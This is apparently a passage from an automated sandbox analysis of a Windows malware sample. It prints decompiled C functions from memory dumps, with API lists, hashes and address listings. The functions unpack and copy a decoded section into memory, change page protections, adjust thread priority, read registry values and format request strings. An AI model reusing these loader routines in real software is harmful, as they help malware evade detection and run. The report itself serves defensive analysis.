				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6d484130;
				_t50 = E6D481B4C(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6d484140;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6d4851a7; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6d484140 = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6D48113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6D481204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6D48121F

Strings

May 5 2021, xrefs: 6D481171

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: 28e28f16a3ea9060abcf0ce788b358c9066dda156edc0e3159add9d03a6cfda4
Instruction ID: 8c8d186ad85af023315d78354dcf8fcc76f763af936e282344e4f0b5865b4554
Opcode Fuzzy Hash: 28e28f16a3ea9060abcf0ce788b358c9066dda156edc0e3159add9d03a6cfda4
Instruction Fuzzy Hash: 68414A71E0021A9BDB01CF98C884FEEBBB6BF49395F24812AD910B7245C774EE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C8907D, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02C890DA
SysAllocString.OLEAUT32(02C84010), ref: 02C8911E
SysFreeString.OLEAUT32(00000000), ref: 02C89132
SysFreeString.OLEAUT32(00000000), ref: 02C89140

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: ab360b7f07baf599ad5a51a5a887918cad3bcb3507791a8db41da02be31e9531
Instruction ID: 8c37a18dcb3bdd425a13955b99c8cd4570b0531712a6b5098c0621df3a476013
Opcode Fuzzy Hash: ab360b7f07baf599ad5a51a5a887918cad3bcb3507791a8db41da02be31e9531
Instruction Fuzzy Hash: C5310C71904209EFCB05EFA8DCC49BE7BB9FF48244B11856EF5069B250D7359A81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C81239, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02C81239(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02C87E20(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02c81245
0x02c81249
0x02c8124a
0x02c8124b
0x02c8124d
0x02c8124f
0x02c81252
0x02c81257
0x02c812ee
0x02c812f5
0x02c812f5
0x02c81260
0x02c81267
0x02c81277
0x02c81277
0x02c8127d
0x02c8127f
0x02c81284
0x02c8128d
0x02c81293
0x02c81298
0x02c812a3
0x02c812a7
0x02c812a9
0x02c812aa
0x02c812b3
0x02c812b7
0x02c812c8
0x02c812b9
0x02c812be
0x02c812c3
0x02c812d2
0x02c812d2
0x02c812a7
0x02c812d8
0x02c812de
0x02c812de
0x02c812e7
0x02c812ec
0x02c812ec
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02C81267
lstrlenW.KERNEL32(?), ref: 02C8129D
memcpy.NTDLL(00000000,?,?,?), ref: 02C812BE
SysFreeString.OLEAUT32(?), ref: 02C812D2

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: 7f0618e25733f4814b4f53d1d249a9de42321451159b6c21c40ef3e94e4ef3ab
Instruction ID: f8991621dbc8a1dfdb0f78119d81ac376eb9d392f48c2dd6a0dcc424e83d1466
Opcode Fuzzy Hash: 7f0618e25733f4814b4f53d1d249a9de42321451159b6c21c40ef3e94e4ef3ab
Instruction Fuzzy Hash: 03216D75900209EFCB11EFE8C88499EBBF9FF49309B1481A9E905E7200EB70DA01DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C86BC0, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C86BC0(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02C87E20(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2c8c2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2c8c2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x02c86bcb
0x02c86bcf
0x02c86bd1
0x02c86bd2
0x02c86bda
0x02c86bda
0x02c86bde
0x00000000
0x00000000
0x02c86bd5
0x02c86bd6
0x02c86bd9
0x02c86bd9
0x02c86be6
0x02c86beb
0x02c86bf1
0x02c86bf9
0x02c86bff
0x02c86c01
0x02c86c06
0x02c86c0a
0x02c86c0c
0x02c86c0f
0x02c86c16
0x02c86c16
0x02c86c20
0x02c86c23
0x02c86c24
0x02c86c26
0x02c86c32
0x02c86c32
0x02c86c3f

APIs

StrChrA.SHLWAPI(?,00000020,00000000,050E95AC,?,02C85D85,?,02C88097,050E95AC,?,02C85D85), ref: 02C86BDA
StrTrimA.KERNELBASE(?,02C8C2A4,00000002,?,02C85D85,?,02C88097,050E95AC,?,02C85D85), ref: 02C86BF9
StrChrA.SHLWAPI(?,00000020,?,02C85D85,?,02C88097,050E95AC,?,02C85D85), ref: 02C86C04
StrTrimA.SHLWAPI(00000001,02C8C2A4,?,02C85D85,?,02C88097,050E95AC,?,02C85D85), ref: 02C86C16

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 0f5f6dd4e0f163805a31ea1741defb6d732826fc0995a55ec5ac93fb9246eb34
Instruction ID: 8f2acbe458d37a11f216a5a2d7effc8fb5bcc0f4d0afe8e603d850c19b4240b2
Opcode Fuzzy Hash: 0f5f6dd4e0f163805a31ea1741defb6d732826fc0995a55ec5ac93fb9246eb34
Instruction Fuzzy Hash: DE0128716013255FD221AE66CC48F37BF9CEF85AACF218518F942CB280DB60CC0196B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D48173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6D481237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6d481746
0x6d48174b
0x6d481759
0x6d48175e
0x6d48175e
0x6d481764
0x6d481769
0x6d48176d
0x6d481771
0x6d481771
0x6d48177b
0x6d481784

APIs

GetCurrentThread.KERNEL32 ref: 6D481740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6D48174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6D48175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6D481771

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e6c6d8cecafaf4e8bba2429ef74a118091d9467bf314396ed54e8f9a2f483b77
Instruction ID: 8348f1be08879e35ce2a24a4a50605f526c45c0875d5f95b26f9d6f231f7bf9b
Opcode Fuzzy Hash: e6c6d8cecafaf4e8bba2429ef74a118091d9467bf314396ed54e8f9a2f483b77
Instruction Fuzzy Hash: 6EE065312062515BAA017A2D4C88F6B666CDF972F6711422AF521D22D1CB50CC0185A6

Uniqueness

Uniqueness Score: -1.00%

Function 02C8579B, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C8579B(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02C8A762(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2c8d2a4; // 0x245a5a8
				_t4 = _t24 + 0x2c8ede0; // 0x50e9388
				_t5 = _t24 + 0x2c8ed88; // 0x4f0053
				_t26 = E02C84B9D( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2c8d2a4; // 0x245a5a8
						_t11 = _t32 + 0x2c8edd4; // 0x50e937c
						_t48 = _t11;
						_t12 = _t32 + 0x2c8ed88; // 0x4f0053
						_t52 = E02C88FE0(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2c8d2a4; // 0x245a5a8
							_t13 = _t35 + 0x2c8ee1e; // 0x30314549
							_t37 = E02C8450C(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x2c8d25c - 6;
								if( *0x2c8d25c <= 6) {
									_t42 =  *0x2c8d2a4; // 0x245a5a8
									_t15 = _t42 + 0x2c8ec2a; // 0x52384549
									E02C8450C(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2c8d2a4; // 0x245a5a8
							_t17 = _t38 + 0x2c8ee18; // 0x50e93c0
							_t18 = _t38 + 0x2c8edf0; // 0x680043
							_t45 = E02C827A2(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x2c8d238, 0, _t52);
						}
					}
					HeapFree( *0x2c8d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02C88371(_t54);
				}
				return _t45;
			}

0x02c8579b
0x02c857ab
0x02c857ae
0x02c857b5
0x02c857b7
0x02c857b7
0x02c857ba
0x02c857bf
0x02c857c6
0x02c857d3
0x02c857d8
0x02c857dc
0x02c857ea
0x02c857f8
0x02c857fc
0x02c8588d
0x02c8588d
0x02c85802
0x02c85802
0x02c85807
0x02c85807
0x02c8580e
0x02c8581a
0x02c8581c
0x02c8581e
0x02c85820
0x02c85827
0x02c85832
0x02c85839
0x02c8583b
0x02c85842
0x02c85844
0x02c8584b
0x02c85856
0x02c85856
0x02c85842
0x02c8585b
0x02c85860
0x02c85867
0x02c85885
0x02c85887
0x02c85887
0x02c8581e
0x02c85899
0x02c85899
0x02c8589b
0x02c858a0
0x02c858a2
0x02c858a2
0x02c858ad

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050E9388,00000000,?,73BCF710,00000000,73BCF730), ref: 02C857EA
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050E93C0,?,00000000,30314549,00000014,004F0053,050E937C), ref: 02C85887
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02C88522), ref: 02C85899

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4d0ff0b7b026a15bacf3797e16a43dd0b845ac91693999b9cc17327b2040f5bd
Instruction ID: ec28354fe205fe68d4ba10ea31a1f7e43a917518e413eaba00846691efcaaec8
Opcode Fuzzy Hash: 4d0ff0b7b026a15bacf3797e16a43dd0b845ac91693999b9cc17327b2040f5bd
Instruction Fuzzy Hash: 22319E32940119BFDB11ABA0CC84E9A7BBDEF44748F528566B606AB060D3709F15DF50

Uniqueness

Uniqueness Score: -1.00%

Function 02C88A1D, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E02C88A1D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x2c8d340; // 0x50e9928
				_push(0x800);
				_push(0);
				_push( *0x2c8d238);
				if( *0x2c8d24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x2c8d24c =  *0x2c8d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E02C846F9(_t44, _t40);
						_t18 = E02C84245(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x2c8d24c < 5) {
								 *0x2c8d24c =  *0x2c8d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E02C845F1();
						RtlFreeHeap( *0x2c8d238, 0, _t40); // executed
						goto L10;
					}
					_t24 = E02C82941(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E02C824B4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x02c88a1d
0x02c88a1d
0x02c88a20
0x02c88a21
0x02c88a2b
0x02c88a32
0x02c88a37
0x02c88a39
0x02c88a3f
0x02c88a67
0x02c88a7f
0x02c88a81
0x02c88a82
0x02c88a84
0x02c88ac2
0x02c88ac2
0x02c88ac8
0x02c88ace
0x02c88ace
0x02c88a86
0x02c88a8c
0x02c88a8f
0x02c88a9e
0x02c88aa0
0x02c88aa7
0x02c88adb
0x02c88ae0
0x02c88ae2
0x02c88ae4
0x02c88ae4
0x00000000
0x02c88ae2
0x02c88aa9
0x02c88aae
0x02c88abc
0x00000000
0x02c88abc
0x02c88a76
0x02c88a7b
0x02c88a7b
0x00000000
0x02c88a7b
0x02c88a49
0x00000000
0x00000000
0x02c88a58
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 02C88A41

Part of subcall function 02C824B4: GetTickCount.KERNEL32 ref: 02C824C8
Part of subcall function 02C824B4: wsprintfA.USER32 ref: 02C82518
Part of subcall function 02C824B4: wsprintfA.USER32 ref: 02C82535
Part of subcall function 02C824B4: wsprintfA.USER32 ref: 02C82561
Part of subcall function 02C824B4: HeapFree.KERNEL32(00000000,?), ref: 02C82573
Part of subcall function 02C824B4: wsprintfA.USER32 ref: 02C82594
Part of subcall function 02C824B4: HeapFree.KERNEL32(00000000,?), ref: 02C825A4
Part of subcall function 02C824B4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02C825D2
Part of subcall function 02C824B4: GetTickCount.KERNEL32 ref: 02C825E3

RtlAllocateHeap.NTDLL(00000000,00000800,73BCF710), ref: 02C88A5F
RtlFreeHeap.NTDLL(00000000,00000002,02C8856D,?,02C8856D,00000002,?,?,02C85DBE,?), ref: 02C88ABC

Memory Dump Source

Source File: 00000003.00000002.910163388.0000000002C81000.00000020.00000001.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000003.00000002.910147319.0000000002C80000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910188301.0000000002C8C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.910196878.0000000002C8D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.910206439.0000000002C8F000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 234fd43777654ca15d6fc5213fc8c2067e69c68d6f3586305bfcf77ee10906c2
Instruction ID: 4f0c672e11dc474db12c70394ad2b69aa14afc2c6baaa37618e9d05ff4055fa0
Opcode Fuzzy Hash: 234fd43777654ca15d6fc5213fc8c2067e69c68d6f3586305bfcf77ee10906c2
Instruction Fuzzy Hash: 33216D71680209ABCB15AF69DC44BDA37ADEB48349F00C616F902D7180DB70DE50EBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D481E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6D481E32(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6d484140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6d481e3c
0x6d481e49
0x6d481e4f
0x6d481e5b
0x6d481e6b
0x6d481e6d
0x6d481e75
0x6d481f0a
0x6d481f11
0x00000000
0x00000000
0x00000000
0x6d481e7b
0x6d481e7b
0x6d481e7b
0x6d481e7f
0x00000000
0x00000000
0x6d481e8b
0x6d481e8f
0x6d481eb3
0x6d481eb7
0x6d481ecb
0x6d481ecb
0x6d481ed1
0x6d481ee0
0x6d481ee4
0x6d481eec
0x6d481eec
0x6d481ef4
0x6d481ef7
0x6d481f04
0x00000000
0x00000000
0x00000000
0x00000000
0x6d481f04
0x6d481ebf
0x6d481ec3
0x6d481ec9
0x00000000
0x00000000
0x00000000
0x6d481ec9
0x6d481e97
0x6d481e9b
0x6d481ea5
0x6d481e9d
0x6d481e9d
0x6d481e9d
0x00000000
0x6d481e9b
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6D481E6B
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6D481EE0
GetLastError.KERNEL32 ref: 6D481EE6

Memory Dump Source

Source File: 00000003.00000002.911231394.000000006D481000.00000020.00020000.sdmp, Offset: 6D480000, based on PE: true

Associated: 00000003.00000002.911197345.000000006D480000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911269546.000000006D483000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.911283029.000000006D485000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.911308923.000000006D486000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: 73a2363c4cc09cade86496820d69b6a97d1f92d6dc3a5eb5778298f5f39c7667
Instruction ID: 460090146aa0337ce164fb7373d66bc9fb6f84dc242f40757b0dd780b4ce72ed
Opcode Fuzzy Hash: 73a2363c4cc09cade86496820d69b6a97d1f92d6dc3a5eb5778298f5f39c7667
Instruction Fuzzy Hash: 4D21803190020BDFCB14DF99C881EAAF7F5FF0838AF00485AD11297541E378EA95CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02C8620F, Relevance: 3.9, APIs: 3, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E02C8620F(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t67;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x2c8d2a4; // 0x245a5a8
				_t5 = _t40 + 0x2c8ee40; // 0x410025
				_t85 = E02C8662A(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E02C8A5FA(_v16);
					goto L24;
				}
				if(E02C8A762(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E02C81546(0,  *0x2c8d33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x2c8d2a4; // 0x245a5a8
					_t11 = _t52 + 0x2c8e81a; // 0x65696c43
					_t87 = E02C81546(0, _t11);
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E02C85AF6(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E02C8A5FA(_t87);
					}
					if(_t80 != 0) {
						L17:
						E02C8A5FA(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E02C88371(_t86);
						}
						goto L22;
					} else {
						if(( *0x2c8d260 & 0x00000001) == 0) {
							L14:
							E02C843DF(_v84, _v88,  *0x2c8d270, 0);
							_t80 = E02C88B3E(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E02C88C8E( &_v40, 0);
							}
							E02C8A5FA(_v88);
							goto L17;
						}
						_t67 =  *0x2c8d2a4; // 0x245a5a8
						_t18 = _t67 + 0x2c8e823; // 0x65696c43
						_t89 = E02C81546(0, _t18);
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E02C85AF6(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E02C8A5FA(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x02c86221
0x02c86224
0x02c8622b
0x02c86231
0x02c86232
0x02c86233
0x02c86234
0x02c86235
0x02c86236
0x02c8623e
0x02c8624a
0x02c8624c
0x02c86251
0x02c8639f
0x02c863a2
0x02c863a6
0x02c863a6
0x02c86263
0x02c8626b
0x02c86392
0x02c86393
0x02c86396
0x00000000
0x02c86396
0x02c8627d
0x02c8627f
0x02c8627f
0x02c8628a
0x02c8628f
0x02c86294
0x02c86381
0x00000000
0x02c8629a
0x02c8629a
0x02c8629f
0x02c862ad
0x02c862b6
0x02c862d9
0x02c862b8
0x02c862ce
0x02c862d0
0x02c862d0
0x02c862dc
0x02c86375
0x02c86378
0x02c86382
0x02c86382
0x02c86387
0x02c86389
0x02c86389
0x00000000
0x02c862e2
0x02c862e9
0x02c8632a
0x02c86339
0x02c8634f
0x02c86353
0x02c86358
